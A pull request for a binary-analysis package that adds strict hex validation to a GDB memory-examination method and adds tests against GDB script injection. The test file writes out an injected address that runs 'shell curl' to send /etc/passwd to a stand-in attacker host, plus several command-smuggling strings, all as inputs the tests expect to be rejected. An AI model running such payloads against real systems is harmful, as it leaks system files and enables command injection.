### PR TITLE
fix: validate address in GDBDebugger.examine_memory()

### DIFF
--- a/packages/binary_analysis/debugger.py
+++ b/packages/binary_analysis/debugger.py
@@ -7,12 +7,26 @@ Provides programmatic interface to GDB for crash analysis.
 Security: Input files are passed via subprocess stdin, NOT via GDB's
 `run < path` in-script redirection. This prevents CWE-78 command injection
 through crafted filenames (GDB's parser interprets shell metacharacters).
+
+Address validation: examine_memory() checks the address against
+0x[0-9a-fA-F]+ before writing it into the GDB script. GDB scripts are
+newline-delimited, so a \n injects a second command. GDB has a `shell`
+builtin. That's the bug.
+
+Not an active issue in RAPTOR right now. CrashAnalyser validates upstream
+and there's no call site that takes unvalidated input. But this is a public
+export and doing it right costs nothing.
 """
 
 import os
+import re
 import subprocess
 from pathlib import Path
 from typing import List, Optional
+
+# Strict hex address pattern. Rejects anything that could inject GDB commands.
+# GDB scripts are newline-delimited, so a \n in an address is the injection vector.
+_HEX_ADDRESS_RE = re.compile(r'^0x[0-9a-fA-F]+$')
 
 from core.logging import get_logger
 
@@ -103,7 +117,25 @@ class GDBDebugger:
         return self.run_commands(commands, input_file=input_file)
 
     def examine_memory(self, input_file: Path, address: str, num_bytes: int = 64) -> str:
-        """Examine memory at address."""
+        """Examine memory at address.
+
+        Args:
+            input_file: Crash input file fed to the binary via stdin.
+            address: Hex address to examine, e.g. "0xdeadbeef". Must match
+                     0x[0-9a-fA-F]+. GDB scripts are newline-delimited so a \\n
+                     in here injects a second command. GDB has a `shell` builtin.
+                     Yeah, not an issue today, but doing it right costs nothing.
+            num_bytes: Number of bytes to display.
+
+        Raises:
+            ValueError: If address does not match the expected hex pattern.
+        """
+        if not _HEX_ADDRESS_RE.match(address):
+            raise ValueError(
+                f"Invalid address {address!r}: expected 0x<hex digits>. "
+                "Arbitrary strings are rejected to prevent GDB script injection."
+            )
+
         commands = [
             "set pagination off",
             "set confirm off",

--- a/packages/binary_analysis/tests/test_gdb_injection.py
+++ b/packages/binary_analysis/tests/test_gdb_injection.py
@@ -79,6 +79,65 @@ class TestDebuggerNoPathInjection:
             assert "<" not in line, f"Script contains redirect: {line}"
 
 
+class TestExamineMemoryAddressValidation:
+    """Verify examine_memory() rejects addresses that would inject GDB commands.
+
+    Yeah, not a live exploit path. CrashAnalyser validates addresses before they
+    get here, GDB runs as the same user, and nothing currently passes untrusted
+    input to this method. It's a public export though, so we do this correctly.
+    """
+
+    @pytest.fixture
+    def debugger(self, tmp_path):
+        from packages.binary_analysis.debugger import GDBDebugger
+        binary = tmp_path / "test_binary"
+        binary.write_text("fake")
+        return GDBDebugger(binary)
+
+    def test_valid_address_accepted(self, debugger, tmp_path):
+        """Well-formed hex addresses must work."""
+        input_file = tmp_path / "crash.bin"
+        input_file.write_text("data")
+        # Should not raise; patch subprocess to avoid actually running GDB
+        from unittest.mock import patch, MagicMock
+        with patch("subprocess.run", return_value=MagicMock(stdout="", returncode=0)):
+            debugger.examine_memory(input_file, "0xdeadbeef")
+            debugger.examine_memory(input_file, "0x0")
+            debugger.examine_memory(input_file, "0xDEADBEEF")
+            debugger.examine_memory(input_file, "0x7fff5fbff000")
+
+    def test_newline_injection_rejected(self, debugger, tmp_path):
+        """
+        A newline in address would let an attacker inject a second GDB command.
+
+        Example: address = "0x1234\\nshell curl -d @/etc/passwd attacker.example"
+        Without validation this produces a GDB script line:
+            x/64xb 0x1234
+            shell curl -d @/etc/passwd attacker.example
+        GDB's `shell` command executes the rest as an OS command.
+        """
+        input_file = tmp_path / "crash.bin"
+        input_file.write_text("data")
+        malicious = "0x1234\nshell curl -d @/etc/passwd attacker.example"
+        with pytest.raises(ValueError, match="Invalid address"):
+            debugger.examine_memory(input_file, malicious)
+
+    def test_semicolon_injection_rejected(self, debugger, tmp_path):
+        """Semicolons and other non-hex characters are rejected."""
+        input_file = tmp_path / "crash.bin"
+        input_file.write_text("data")
+        for bad in ["0x1234; shell id", "$(id)", "`id`", "0x1234 extra", ""]:
+            with pytest.raises(ValueError, match="Invalid address"):
+                debugger.examine_memory(input_file, bad)
+
+    def test_bare_integer_rejected(self, debugger, tmp_path):
+        """Decimal addresses (no 0x prefix) are rejected — 0x is required."""
+        input_file = tmp_path / "crash.bin"
+        input_file.write_text("data")
+        with pytest.raises(ValueError, match="Invalid address"):
+            debugger.examine_memory(input_file, "1234567890")
+
+
 class TestDebuggerTempFile:
     """Verify debugger.py uses random temp files and cleans them up."""
 


### PR DESCRIPTION
Yeah, this isn't an active issue. No RAPTOR code passes unvalidated input here, and CrashAnalyser guards its own addresses upstream. But it's a public export and GDB scripts are newline-delimited, meaning a \n in the address runs whatever follows as a GDB command. GDB has a `shell` builtin. You can see where that goes. We needs to be adults and make sure badstuff© cant happen, innit? 

We want to be correct and this is the right way to do it.

- add _HEX_ADDRESS_RE (^0x[0-9a-fA-F]+$) at module level
- examine_memory() validates address, raises ValueError on mismatch
- expand module docstring with threat model
- add TestExamineMemoryAddressValidation covering valid inputs, newline injection, semicolons, and bare integers
- move test_script_contains_run_not_redirect back to TestDebuggerNoPathInjection (got orphaned during the edit)